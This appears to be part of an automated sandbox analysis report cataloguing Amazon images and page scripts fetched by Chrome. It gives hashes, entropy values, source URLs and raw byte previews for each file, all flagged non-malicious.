                                                                                                                                                                                                        Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 277x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):18491
                                                                                                                                                                                                        Entropy (8bit):7.96254082348555
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:FkE9dKhFzwONu+p0nDoaCxupkiY/UjvRkg/u:F6hFzwIHunDoFxupD2CvRxG
                                                                                                                                                                                                        MD5:CDCDB63B36958755B17AA1135AB35044
                                                                                                                                                                                                        SHA1:A24D4B5682600488141A9CE75140F331891AEEE1
                                                                                                                                                                                                        SHA-256:115D7FA737C771E1A7B6C89CA831F732907B5C1549E80D22CF1BD09D853CEFD1
                                                                                                                                                                                                        SHA-512:3A1B08ADD31B07320436E8943F01E8FFF8B8259A160F8C72B00406515A399E0C321B31C00A7D4A948B6E13F097C7A0DE95C1F74550D9C5FE459CE22102199D2F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/81F8SVBsHYL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6...................................................................?A.^?S...HF.3......^.....8......7/C.a.z.)....%Q.....gRra...J.....>^...._Q9X7..N...UF^..o..*.{.........^..\!3..g..>.{..L~..E^K{Lx....gs.fD.f...B...U..(.Z.P..n.&<n..u...o..Q...,.w..........A]|..}.1.v.\.D..~.r.oF...1.........T....;..^...g..n@..k.L..z].0...~...w......C. ..<.G..&.......@\0n .......~.R..............N.......w..........A4.'^.....j..f.5..8.SH.j...1.Z.`.}m...F...g....u.......2..N..S.j..._~...Lz...l)...V.....i...\zi...k3.=..1F...A.U.6.-.?..-....d.K...z.......h..y...v.6.(...41..........y.D :.w.87%w...Z,.......O.l.u.P...j......-..|..p..f.C.4.\....iI..m-.xV..f0x..Y.L.j.^.2T8..y.FR.S..t.8m'.kOO_.....t..~.dg_;Q.Hm..K..........O.+...i3..X...`...J...8v...P......B..7. ..+3z....s.......e.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48950
                                                                                                                                                                                                        Entropy (8bit):7.963333607058689
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:83AZUS01W7NNNNKzXxmQViG7l0wK+4x0Zc/TfigEC+Vne8oWNIIzYUSuhO7jaZMM:aIUt1lx/VBlm+ZcDibC+VBocsUSv7Ia4
                                                                                                                                                                                                        MD5:A7350B040766C811565CE21F8D833908
                                                                                                                                                                                                        SHA1:1F8DAEF415AFD88E5D8B485E5C7D62941492BCD3
                                                                                                                                                                                                        SHA-256:EA2AC38C7E469084C70A134C536A212791FFC8AE20DEC4719ED555F6C61314AF
                                                                                                                                                                                                        SHA-512:F8DDA1C80EFBB0AA28C84E85276A495D226C53DA58665642DB7F3E9671C1CA3ED38E26BC58CBD8D41565B506B70916F99F7D13304AD5C1FC79BCC08EF9CBA31F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................;...................................................................................[a.....]...p.6.[..?\...^_~.U.._..J.......................`.....^...(.vE....../{~.H.]!%.!.9..~............ti....sdV.9..w8........%.*fv.......>P........~x...;4Ch.$){6............S&{F.%,..................+-..............lw<vM..\.l.........&[....].......r\4.z.'.~h.?:....z.....<S..o.......D87!......8}.....?.E..o.O.{.E..F....G..'x....1.l..........L...%.. .....,......@......u/{o......\...co5k.'.;bS....G...h...E[.m.5.*...e7#....i........D9.r8......y.../...Mb.k..t......H....ik.8wk-.....T..^.N....O`.b.(.0'Tv....;E...5.,.q.......<........n....i.L.2{...E..?*.-...9.-....4<u."..eW.s........H."e6.....q...A..>...........u......a.MY..6..7.C..q.G.yfLM.1.......r........x...*.<..........8.{1...l0...........F<...].a.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 172x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2332
                                                                                                                                                                                                        Entropy (8bit):7.746909295297464
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rlTd74GhksT3OaUUeCpvR7Xi+uVm9hEcb/s/pmW:TQTd7CsT3OaZe+r5EBmW
                                                                                                                                                                                                        MD5:9F5FAF12ED3C0222A111D42672793891
                                                                                                                                                                                                        SHA1:A8A6DACEC33CC8551C73F7AD615E0C3EC3E66D3A
                                                                                                                                                                                                        SHA-256:AE21D30BA4B1EE131ABEA0DE91F90A648FF069FFE51100DCE5755EF00E493CEA
                                                                                                                                                                                                        SHA-512:37A3D3A652DC86F4B1A9556FCF193929A111FFC1E77357CE3915AFF85F1ED7F2392EB37C9B435BDDFCF38AE5FCEB75A544EC7C228577D9CBAB21CA0168D29F59
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/51ytwQsTQJL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........}.................................................!1..AQaqs.....2Sr...BR......3bc"$.....................................................?...B..uN.J.zG.......:..57.;..B.+..r.%.@i.}.........0.e._.r.....M........ZR...../.H...;...W|..a...=!..M...@WS.....*.+.."...eD..|O..J....O.! ..7.j...g>...b...W.K:u.E.ku...?..W.W..S....h...63.K.O..]M{.|...zD.I.._amJ.z..b..ZK...K.......V...k...y$r;.4....s|.B....z..N7....N6.1.V...zz.#:x..L....-.f..5..e*.e.. ......X.!...@.........L.0.j.......f^..9.y..\x..a1...^..3r2.Fn..8ba..~1.R^9...g.V&.*..(..MV....d.U..'.......qr@lM.U.....W..p..K.R.21U7......9...r.b0...$..V...Q...T.J......`B.....S|........*Ou[...;.s.r...ZX.8y.iy.y.7l.....Gu%.%.....fG...P..-Vf..?......{W..I.H..?.el........IM.S.M<.....Q..._^].7.4p.z.uf.,...T.R..@].a..........!.p.L.......7.A..g......f
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 123x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8289
                                                                                                                                                                                                        Entropy (8bit):7.958049715034123
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:bSNyt2iR/i0LIrFQg/71ayUGURZ8tFXlxwM1Zx+PuJ:bSIh/aFazF8rxlJ
                                                                                                                                                                                                        MD5:FCFB0ADA0BD17CC4924959AA01103D08
                                                                                                                                                                                                        SHA1:5EE6466E1DC6A17E4EEC44BDF07C65A4795921E0
                                                                                                                                                                                                        SHA-256:FBC6BA56AE9E180F9CC588EDDC30BB4EBA8A83C35430BC1BD05C02890F7345FB
                                                                                                                                                                                                        SHA-512:263A99D097F871569B2044BE92DDB2DE8C9BFFE357C91040ACFB6FE6FF5EEC888E16C3DD5209725234281F9BAD6B37A933BDCB56BC2C4068D3DC4EED2F945284
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........{..".............................................................!.1."AQ.a.2q...#3BS....R.....%DT....4bs.d..................................................!..1Qq23A.#$4ar......."C.............?......<b.^...<<..../_.O..#A.|.. .SI0.}........={v.,.q..y......O........>...v.u.*zs?.........&..W%.^J..n....B........+.@.iv..T..$m...<.rE.<.x..Q...Y..E.jC.>.A.}...G.A7.....Z*#.....Fc]..T+.....K..j.2...,.G..5.....iO..a..l.92w...Q........Y..w.....20..`l_..Ls1...|...Ro....*...U%.u/.Z.<..1..Z.....f..|...]z.#p.d..o...W....vc=...rh.....z.mV)..J..F...y2..3...*.6...\..m....za. .c.....Qc..........e.$.i.{..W....j<i!.w..w0..4aH..X.n..9R.{.....O.`..x.;.>.S|&.&.e..K.._.7a............)b.F..-|..ThZ......W4.t:..X.qe.B....k...wQ||.....r.....H#..W.>......./....^....b.o..7.(....y......X.8.>..?n...D...A7.i}.....t...!O.M..|...H....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12722
                                                                                                                                                                                                        Entropy (8bit):7.950008250929953
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Yc3bsqRZEkqOFCqHO7FtWmrnEBaD5imFy1OKj:13btZEIHSFtWmEBad+OO
                                                                                                                                                                                                        MD5:4BDA74E30A7870FC1B283F8168832194
                                                                                                                                                                                                        SHA1:56A467E65D4263002707C0406E7E8DE057EE4842
                                                                                                                                                                                                        SHA-256:299237F1AF3C24914F98FBBAC7D5B9243206AECCE16BF3D4ED0408F215CC7F52
                                                                                                                                                                                                        SHA-512:3D54813BD8388AF2199C721BCAC970D72F93C55FA6572A1EA28F34732D3EC552A26C676434B52CF57672DF5AE13563F233F162C6E272E028C05895F892A27A59
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/81ZqHezuUOL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5......................................................................X.P....j...G.B..~~p.^...\-..;...:f.]..c.......Y....GK.}.......Z.>.TZ9.[.(=x'.*...nX...pvq.F....=.-5.3..6.6.ix=.4.;.>.1x...c...D[...@9w....%F.K...M..}.7...|.+.....1.-%..h.3.~ww..<....,...3B?'yz.......CI..1.j....k....,...9.}.;.!..g.Xk.f...>..|..~-d...}.|\=...=]qQ.`....^.........z.V...<.D.....[....{m^.$].7......JH.W9...p......~[.2....j....\...W...tCl.....,....s..L..}.5j./...m..N.../._6..;.n...Lw....@.X.^..C.S&.."..|......=...77..j.^..Y8..a02....2z.o...g....i..nr..u.x.Y4t..<....].@.goyg.yt...kBKm.1.>.=v.1..P6...c..&y.......i......4+i...s...x...L.!&.T8DGsq.g...#.......r..[...&._.%...z#...s.C...z...}.-b.;..lD.*.F....m.Ud{0..i...<....$....z....6..q,.d.Z.,.fR.u2.....2....Cc.........ez/.-.F.....D..)K.u\M......H.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4812
                                                                                                                                                                                                        Entropy (8bit):7.764396141941845
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T8RNJPe8pBOTMBdyCE/sZmjO+0Ciejkt+IW1aFPFVte25r:6nGABdyCEUZdCiejkt+D1GPFVtJ5r
                                                                                                                                                                                                        MD5:156CEE77DE9BD6FD6DA19DE67B05A512
                                                                                                                                                                                                        SHA1:52EFD1B8FB97D421409F2CA458ED5D15D5BA21C6
                                                                                                                                                                                                        SHA-256:70E60C2AA8AE949818F148EF54DBCC5CDD8EDD3F8DD0CC82A4AECCC78C2AFB84
                                                                                                                                                                                                        SHA-512:9E4412E8D586A6678330AF7B2744F5A6E31F0537995409838B23D5A4358A3451B2E5EBCAB90D4E375905F2F3C95130B04F9640DA8EE669387FC8E371ABC6DDC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2................................................................. ...y.....9.......O...`......U3V....^m5..........{.3k_.zj.<.Y.....{h.B...,M.,P........{^[..y1......oCk.....g"...r..%.......#]...).WY.b.Y..)..$.7mdfWb.R.......|...N......^8/.D._Ld.O..McA(...........w.R.ys.9..Q..1../..'...X...2r......X.8..o...}<}K../..........q7m&o........6.....U..e=k*0.X....2&..XX.nz...p.......\...c.<...1......|..[..].U.............."Z.....+.J..u.....<.<...50.0........^{..&......n:.*..>NQ..}...._..x.}G ........TX....ST..-q...|/.K.O^.^...................1...........................!123@. "4A.0CQ#.BPR`..............qY..wo?..G}.+.od..IG:.a..I....p.L..P...c.o.&.AL...0....l.3R.r7....Y...^.....k...........S..I........2'.W.6v.GL....ue..o=b..Z.`.cV..9.............s./m...oq%C..N.Wl[,..U+.s.h.V^...5b..JY...16y\.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3859
                                                                                                                                                                                                        Entropy (8bit):7.7580495385560475
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:n+Pp+uyDVBPeFZKiaSR2/RZzO4qyD0hM93:n0wdPDVR9qa0Kx
                                                                                                                                                                                                        MD5:47E6362325B51AF9B9A01D855070810B
                                                                                                                                                                                                        SHA1:09E631CD9343A5878566C2368DC7BE4E68E8132D
                                                                                                                                                                                                        SHA-256:E3535F690F9EA1270D88D1DE7B4FCA4AB1D45B19E9241F100477EF32C4CF7651
                                                                                                                                                                                                        SHA-512:41BC909BA4C104D2479B48406702A7A39283778977DFAF8402951BFB0AFD1827953FDC877F1D68F0AB019D188DF754E61994FF2E292BBD71B37C608702F09F21
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332322_186x116_1X_en_AE._SY116_CB597933578_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........6......................................................................7..............`...b.[w.L...J._]e..k.."..............*...6W..|..Nb...E...f\.dmx..0.......6....DZ..7`...j......4....eN.?k....f. .......-;/....../4./Z~..N.>.&K..Z.{JC...,!...Q........+Mi9..iOg.......XG.7.....w...... ...............U....N..v=....q1...O.................Y.............................%5E.!6Ua..&14@AVe....$7DFQTq..."0PWu........'8Gdtw................?......g..&[.R....9.Q!.. ....\a2...O....s......)75&.?...1s...[.d.5i/.t.2.#n{@cWIP.Y3.[..J.w(,.M.....msGq....2...X5z..k.W.!....!..0.<..8G..h.....D..Q$.2..0.U...5?TF[%5N<...2...\u..4.?J....C......N..S..I2I....n.4.S..C..M.#........&...J.Ri5...d..#....?DG.@.".....@..Kw...u.r.I.-.....p...-..K....c.0..n.+.)......jL.+...Oh..C.....Lc*\....u5...Z.o....C.e....w.`K..S=_
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (657)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):59872
                                                                                                                                                                                                        Entropy (8bit):5.423893338414905
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:H/ljDE8qpS8Ik2ajEUt+XuABZ5WBhw/Ji0nEFltdYaGGChCbXf+QRqxw3FqwcE:HtjzTPkT9+Xu0/Ji0nQYrg
                                                                                                                                                                                                        MD5:B09F2B19E47B13B280F94DB002733607
                                                                                                                                                                                                        SHA1:097E1AA36F6D144808EFF3EEA8C513C60F523D03
                                                                                                                                                                                                        SHA-256:6C2EBC2D8EE36D2A945AD08DFEB9FA674DB06600027C393E8778D01B178A7B82
                                                                                                                                                                                                        SHA-512:80CE4FF55F3367CD1021DC195DEE40367A9F15B1756F3B100307E0F76003D8971A45FDD0EC0BE16CBD356B330E18617C1A0D04E30FAABD98D7061B01E9ACB275
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(A){var k=window.AmazonUIPageJS||window.P,q=k._namespace||k.attributeErrors,y=q?q("IdentityJsCommonAssets",""):k;y.guardFatal?y.guardFatal(A)(y,window):y.execute(function(){A(y,window)})})(function(A,k,q){var y="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(q){return typeof q}:function(q){return q&&"function"===typeof Symbol&&q.constructor===Symbol&&q!==Symbol.prototype?"symbol":typeof q};(function(){function z(b){var c=I[b];if(c!==q)return c.exports;c=I[b]={exports:{}};.A[b](c,c.exports,z);return c.exports}var A={5276:function(b,c,a){function d(a,b){var c=Object.keys(a);if(Object.getOwnPropertySymbols){var l=Object.getOwnPropertySymbols(a);b&&(l=l.filter(function(b){return Object.getOwnPropertyDescriptor(a,b).enumerable}));c.push.apply(c,l)}return c}function f(a){for(var b=1;b<arguments.length;b++){var c=null!=arguments[b]?arguments[b]:{};b%2?d(Object(c),!0).forEach(function(b){(0,l.default)(a,b,c[b])}):Object.getOwnPropertyDescriptors?Object.definePro
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 219x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7347
                                                                                                                                                                                                        Entropy (8bit):7.947096958801787
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:LW3m5aJ34UaPDQWGrIPVnyg0rQPJ3vecEYVLDWTKy+HxH2:LW3m5TTDorIRvik3vzEYxW5+HV2
                                                                                                                                                                                                        MD5:A1618E2DBD660E5E0148A8AF60E6138F
                                                                                                                                                                                                        SHA1:40282B6CB047BAFD8F88973DD7B1C15906B735B2
                                                                                                                                                                                                        SHA-256:1D9BF1511006BD908CB4D88368EF9D850B33F21CCA29A5A7B446806D35EAB468
                                                                                                                                                                                                        SHA-512:F247F3AE41E8B18C3E8A6BB3A7850B28148909F7C89F1A593855CB257EA3EDABE93534162714DA4B4B38A5D253E11DCC80AED8F774F24A472138C7C45DEB7BDC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1.A."Qaq..2BR.....#br.s.$3S...4c.%.........................................................!1AQ.."aqr..#2....$3..R................?..Z...!.@....!.@....!.@............*..zd.p.?.D.[Rv.-|.?W...'c.....[..Zi58.5.sO+#ok....1>.8..p2.h\t..W?....Ff+.4..L..y...<.....f7.M._...$..o....ql.t.#..9..J...C...W.b..C.2....sX2...v..U}N."..l-.s.....3..5?...{....}.X\=....w<i..A.u.z...o..}M6%R*....,.....C...\.n.8<g...lA..Z......u.3........'..^.........ms.*..v=....a.c..,.N.H?..|...,.....*P{.B..8.. ..B... ..B... ..B...........$....er\c.....=....}....&...M*..o4.^......|...............q.g...RNG8?.s.s;S.....9.[.q..:c~..7j.{5w......'.x...n$..T9.....F..Q....h.../...q...1.h......S.3#...w...6..3...:p&$H(^.I.6m...?y.v...$.c...)....5c....`.@Z.Q..............%.i.o.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4622
                                                                                                                                                                                                        Entropy (8bit):7.908400268313229
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T1lewmvnLua2bE4kw74+z+R/NmiwEM3pcUJOw9jolaD:/ew2LGl4+iLmiwEe9j9
                                                                                                                                                                                                        MD5:649B4EE9FE24FBF8B26690F4E4818AC4
                                                                                                                                                                                                        SHA1:620E71A4EA5BA6722CB09DC16A0EAFAFCE0DA212
                                                                                                                                                                                                        SHA-256:623DCBDFF322275F0A61572330F94EE0A43E4ECDEB4B12CFF2354C52770B74D2
                                                                                                                                                                                                        SHA-512:B1A46FB51CF3AC899A27E753F42AA3414738E5EBAAB29D8E8D4C91C8313BD50B5272A2EA6BDD089F324C2520CE23534826921A136F10526CE7301CB2A670EC90
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763848_372x232_2X_en_AE._SY116_CB558609315_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.1."A..2Q.#aq..3BRb...$......U.............................................1.!A..2QBRaq............?..:R.c.)JP.R..."..I.u.8...T@;.'.(.ZV.={O..K..x#Y.L..0"..g!w.q...lj......a......L...t...J....?.....8..|.)\......,p.......]2..)..G\eN..J.=_..}.?....-.....+.+.k.....R.8)JP.R......)@*...N- ...LR[.... s....L...T.u.*..p..O..I.OX...9w.:E-...;...0E..]...EuMFI.q.+ev. .|.0............f..-4xt;....X`IM....`..T.....TD..O...O.K.v.+..Heq...qN..K.u`.m .=..}.jW7.<.^..\...T..o...b..../:.F..G.)]H[mA.;....s.\..k.k[.ga.M.QJ..* (.......q..:..L..)..u...9#....NpA.^...2..1...`..{..7..^..=3Q.".......}b...Nm..c..I.A.@|..U..Ddpz..e[.......p....\^.+..^)._..P...#..4..4......f..........4.....]..&.....>..N|$.1......f.j.....b..t..)@)JP.R....8..J.A.:..V.=..b0Tm...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (607)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10158
                                                                                                                                                                                                        Entropy (8bit):5.1802871493858484
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:WiF4QtoZmosQwyi3aOxDxpL6shV/icawy8P+KexjLIvwEgveEHvuEfunuyUIK8AB:pto0oiPpL6shFiP8PX9I/PvV2yZ
                                                                                                                                                                                                        MD5:07A45F05EF21AE19E99F4B71039C95CD
                                                                                                                                                                                                        SHA1:D3B7399B84358638740DC746EE34FF8236B8E06C
                                                                                                                                                                                                        SHA-256:DD16175D6A1472CEA68FC92923A98B80C7CBD809877CDFDD1091200FE3118C84
                                                                                                                                                                                                        SHA-512:82FD00D8484B8365138B95D59413F916029B146059373013EFB5E9760FA5570D7F915A072D8F16563E6C81379DC0B7EA619D7C373CC4F77D1B8387D93282ED28
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/31IkFoRynML.js?AUIClients/AmazonGatewayHerotatorJS
                                                                                                                                                                                                        Preview:(function(g){var e=window.AmazonUIPageJS||window.P,w=e._namespace||e.attributeErrors,p=w?w("AmazonGatewayHerotatorJS",""):e;p.guardFatal?p.guardFatal(g)(p,window):p.execute(function(){g(p,window)})})(function(g,e,w){g.when("generic-observable").register("gw-herotator-controller",function(g){var f=function(){};return function(e){function y(){h.notifyObservers("delayBegin")}function z(){h.notifyObservers("delayInterrupted")}function w(b){for(var c=0;c<l.length;c++)if(l[c]===b)return c+1}function k(a){a=.a||{};return{delay_complete:a.delay_complete||f,js_ready:a.js_ready||f,fg_loaded:a.fg_loaded||f,mouse_move:a.mouse_move||f,mouse_leave:a.mouse_leave||f,delay_interrupted_timeout:a.delay_interrupted_timeout||f,rotation_complete:a.rotation_complete||f,goto_card:function(a){a!==n&&b.user_navigation(l[a-1])},user_navigation:a.user_navigation||function(a){b=new D(a)},user_interaction:a.user_interaction||function(){b.user_navigation(l[n-1])},stop_autorotation:a.stop_autorotation||function(){b.u
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 171x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10570
                                                                                                                                                                                                        Entropy (8bit):7.961545667809982
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:TmTNafu4r6xNS1ngU0Wfsr3d6/d2WPJZXx+2kXlhOl12OgobmlNr:6Tgn6HSftuNOsUVkKlAOJbYF
                                                                                                                                                                                                        MD5:2500F63A19DA721A1F6A97C110642CC0
                                                                                                                                                                                                        SHA1:1E250F03A798FB73EBF182A0E92A010BA572CCF1
                                                                                                                                                                                                        SHA-256:1A7790F479695CA7BB532CB3A98DB0724D459CA02D4F6A4518A1CB60D30B1E44
                                                                                                                                                                                                        SHA-512:C9864C1D7D898CBE53A872C7C44783A3431C25B1DE55EEB0572F11C79B64FCD50302ACD6026871F18ECE8C09A4D2125425522FD532736CCCA7B148098F98A19B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61VxZ5U8MKL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!.1"2AQq....46rs....#3RTa.......5BCUu....$DSbe....dt..................................................!1..ARa.Qq.2"...3B.#..............?........:....Ems4QC...*B..Wn.j.m..h.^:...g.....K.m.j....u.../ .d..A..T.3...../.\2..._........|...s..7.J...........eh..7......7...W.nu.uy.P.|...K ..r...\#o..W...z...>.y:....S..>.....?.I.i.;J..3..L.t.....7..sZ..w.p...em;N..i..w.....,9L...>Mev%VC..nM.MwZ..8.\.6v.| .\o.s:...3......z...qq...[3}...\.K..).r.r.n.....G.~*....{....D...6...q.;..8..y.g.iZ...%..0..~i..7W.RUw...........k..u?....<B9.w...?..k..........k........N.lY...y...Z.../.K.y...Z.../.Mz..{.7.Xi...P..$....I ...?..0..u\JGT.........DU[.y...Z.../.K.y...Z.../.E..=......J/l..P.$_.<......)g...?..?K....g.]j.9..=.K....dbX.....<.Z.Uc=..J ...&o..7E...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4253
                                                                                                                                                                                                        Entropy (8bit):7.693159834492515
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:R9sgEkq/xzahDr8TLnhZwIQt1fxP22K31IHasx2edONy/:87zaqrQt1fxuGx5
                                                                                                                                                                                                        MD5:A17C20E8E0813DD095428B78562E3A11
                                                                                                                                                                                                        SHA1:83D3E5D255AA47ED2821C564BAD2E9CA8C28BDF9
                                                                                                                                                                                                        SHA-256:CA4FCE334F0ADC538E66E64DB009C947055188644AB5BD2999744A256E7A94FA
                                                                                                                                                                                                        SHA-512:7E1DB7571FAB8AE3D4C78F04EF60D08C67575273B5FAE9A3B030783421B775E78DC089A5DB5933BAC27F15CBB5E1C5F0CC83A2A16311608BA495B14A79A30A3D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_19_BTS24_AE_GW_QC-CROSSA_DQC_CL_PersonalCare_186x116_EN._SY116_CB566993070_.jpg
